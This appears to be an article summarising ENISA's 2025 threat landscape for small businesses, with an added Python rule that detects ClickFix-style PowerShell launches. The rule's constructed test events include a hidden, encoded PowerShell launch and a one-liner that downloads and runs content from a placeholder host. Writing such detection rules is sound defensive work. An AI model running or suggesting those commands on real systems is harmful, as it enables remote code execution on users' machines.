ENISA Cybersecurity Threat Landscape Report 2025: key takeaways for SMEs
Urgent Security Update: What the EU’s Top Threat Report Means for Your Business
Cybersecurity threats are no longer reserved for major corporations. The ENISA Threat Landscape 2025 (ETL 2025) report from the European Union Agency for Cybersecurity (ENISA) makes it clear that cybercriminals are industrialising their attacks, making even Small and Medium-sized Enterprises (SMEs) high-value targets.
Although this report provides a broad overview of the European cyber threat ecosystem, covering nearly 4,900 incidents analysed between July 2024 and June 2025, the key findings underscore that basic cyber hygiene and robust resilience measures are vital for every private organisation.
1. The Core Threat: Driven by Profit
The most significant immediate threat to organisations of all sizes stems from financially motivated cybercriminals. This activity is fuelled by a professionalised and resilient criminal ecosystem in which the continuous proliferation of services like Ransomware-as-a-Service (RaaS) has lowered the barriers to entry for attackers.
The vast majority of cybercrime incidents targeting EU organisations involve ransomware (81.1%) and data breaches (15.2%). Adversaries are highly focused on aggressive extortion tactics and capitalising on fears related to regulatory compliance. When a breach occurs, the resulting data is frequently leaked on cybercriminal forums for sale.
Info-stealers are a consistent and prevalent threat vector enabling these larger attacks. These malicious tools facilitate credential theft, session hijacking, and access brokering within the criminal supply chain. The Lumma info-stealer, for instance, was assessed as the most prevalent info-stealer since the beginning of 2025.
2. How Attackers Break In: Phishing and Exploits
SMEs must focus intensely on securing the two primary ways hackers gain initial access to networks, as documented in the ETL 2025:
Phishing Remains the Dominant Entry Point
Phishing continues to be the primary method for initial intrusion, accounting for 60% of observed cases. This social engineering tactic is used to steal credentials, hijack sessions, deploy payloads, or execute commands. Phishing is now industrialised through platforms like Phishing-as-a-Service (PhaaS), enabling operators of all skill levels to launch complex campaigns, such as those impersonating hundreds of organisations via the Darcula platform. Furthermore, AI has become a defining element, with AI-supported phishing campaigns reportedly representing more than 80% of observed social engineering activity worldwide by early 2025. Newer techniques, such as QR code phishing (quishing) and ClickFix-style scams (tricking users into executing PowerShell commands), are gaining momentum.
Rapid Exploitation of Vulnerabilities
Vulnerability exploitation remains a cornerstone of initial access, accounting for 21.3% of intrusions. The threat lies in the speed with which these weaknesses are exploited: widespread campaigns are rapidly weaponising vulnerabilities within days of their disclosure. Attackers frequently target internet-facing applications such as VPN appliances (e.g., Citrix NetScaler, Fortinet, Check Point, Palo Alto), collaboration software (Confluence, TeamCity), and email servers (Exchange, Zimbra). This rapid weaponisation underscores the need for organisations to ensure timely patch availability and rigorous cyber hygiene practices.
3. The Amplified Risk of Supply Chains
Adversaries are increasingly optimising the efficiency and scale of their attacks by targeting third parties such as digital service providers. The compromise of a service provider amplifies risk throughout interconnected digital ecosystems. For example, the compromise of an external provider managing the Telemaco platform led to the paralysis of ticketing systems for Italian transport companies. Adversaries also exploit the digital supply chain by compromising software or open-source repositories, or by deploying malicious browser extensions.
4. Essential Steps to Boost Your Cyber Resilience
The report stresses that defensive strategies must emphasise preventing initial compromise and ensuring resilience against attacks that succeed. Based on the recommended mitigation measures, SMEs should focus on three foundational areas:
- Strengthen Identity and Access Controls: Multi-Factor Authentication (MFA) must be implemented to counter credential misuse. Businesses must also enforce strong password policies, and restrict user accounts to the minimum privileges necessary (Least-Privilege principles).
- Maintain System Health and Visibility: Organisations must be disciplined about system hygiene, meaning software must be updated rigorously to prevent the exploitation of known weaknesses. Furthermore, basic security tools must be in place, including Antivirus/Antimalware solutions, and robust endpoint controls must be implemented for execution and behaviour prevention. Businesses should also be aware that cybercriminals are now actively using tools like AvNeutralizer and EDRKillShifter to disable Endpoint Detection and Response (EDR) solutions, making stealthier intrusions a serious concern.
- Ensure Resilience and Awareness: Assuming some attacks may succeed, resilience controls are crucial. This requires maintaining reliable Data Backup strategies, storing data remotely or offline, and enforcing Network Segmentation to contain threats and limit their spread once a breach occurs. Finally, User Training is essential to help staff recognise and resist persistent social engineering attempts like phishing and vishing.
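The ClickFix-style lures described in section 2 and the endpoint execution and behaviour controls called for in section 4 meet in one concrete detection: a PowerShell process launched by the user's own shell with switches that hide the window, decode an embedded command, or fetch and evaluate remote content. The script below is an added example written for this page, not code from ENISA or from the ETL 2025 report. It runs a small weighted rule over constructed process-creation events in a Sysmon-like shape; the field names, the indicator weights and the alert threshold are assumptions chosen for illustration.

```python
"""Added example: behaviour-based check for ClickFix-style PowerShell launches.
Not code from ENISA or the ETL 2025 report; the event schema, indicator
weights and threshold below are assumptions made for this illustration."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# A ClickFix lure ends with the user pasting a command into the Run dialog or a
# terminal, so the PowerShell process is a child of the user's shell rather than
# of a scheduler, service host or document handler. That parent is the precondition.
USER_SHELL_PARENTS = {"explorer.exe", "cmd.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Each matching indicator adds its weight; the sum is compared to a threshold.
# Patterns are case-insensitive and accept PowerShell's abbreviated switches.
INDICATORS: List[Tuple["re.Pattern[str]", int, str]] = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I), 2, "encoded command"),
    (re.compile(r"-nop(?:rofile)?\b", re.I), 1, "no profile"),
    (re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 1, "execution policy bypass"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|iex|invoke-expression)\b", re.I),
     2, "remote fetch / expression evaluation"),
]

# Constructed sample events (not real telemetry). Keys mimic Sysmon event 1 fields.
SAMPLE_EVENTS = [
    {   # 1: lure-driven launch pasted into the Run dialog
        "User": "CORP\\alice",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -ep bypass -enc PLACEHOLDERBASE64STRING",
    },
    {   # 2: ordinary interactive use by the same user; must not alert
        "User": "CORP\\alice",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell Get-ChildItem C:\Users\alice\Documents",
    },
    {   # 3: scheduled maintenance script with the same switches, not user-launched
        "User": "NT AUTHORITY\\SYSTEM",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\backup\nightly.ps1",
    },
    {   # 4: lure variant that fetches and evaluates remote content (placeholder host)
        "User": "CORP\\bob",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": 'pwsh -nop -c "irm https://example.invalid/update | iex"',
    },
]


@dataclass
class Finding:
    user: str
    score: int
    reasons: List[str]
    command_line: str


def score_command(command_line: str) -> Tuple[int, List[str]]:
    """Sum the weights of all indicators present in a command line."""
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(command_line):
            score += weight
            reasons.append(label)
    return score, reasons


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_clickfix(events: Iterable[dict], threshold: int = 3) -> List[Finding]:
    """Return a Finding for each PowerShell launch from a user shell whose
    command-line score reaches the threshold. Events whose parent is not a
    user shell (event 3 above) are left to other rules, because the same
    switches are routine in scheduled administrative scripts."""
    findings = []
    for event in events:
        if _basename(event["Image"]) not in POWERSHELL_IMAGES:
            continue
        if _basename(event["ParentImage"]) not in USER_SHELL_PARENTS:
            continue
        score, reasons = score_command(event["CommandLine"])
        if score >= threshold:
            findings.append(Finding(event["User"], score, reasons, event["CommandLine"]))
    return findings


if __name__ == "__main__":
    for finding in detect_clickfix(SAMPLE_EVENTS):
        print(f"[score {finding.score}] {finding.user}: {', '.join(finding.reasons)}")
        print(f"    {finding.command_line}")
```

Two of the four constructed events produce findings: the hidden, encoded launch scores 5 and the fetch-and-evaluate one-liner scores 3, while the user's normal directory listing and the SYSTEM-launched maintenance script do not alert. The parent-process precondition is what keeps the rule quiet on the maintenance script; without it the same switches would generate noise on every patch night. A rule like this only helps if the process-creation telemetry leaves the endpoint before an EDR-killer of the kind the report mentions can interfere with local logging, which is one reason to forward such events to a central collector.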
You can read the full report here.
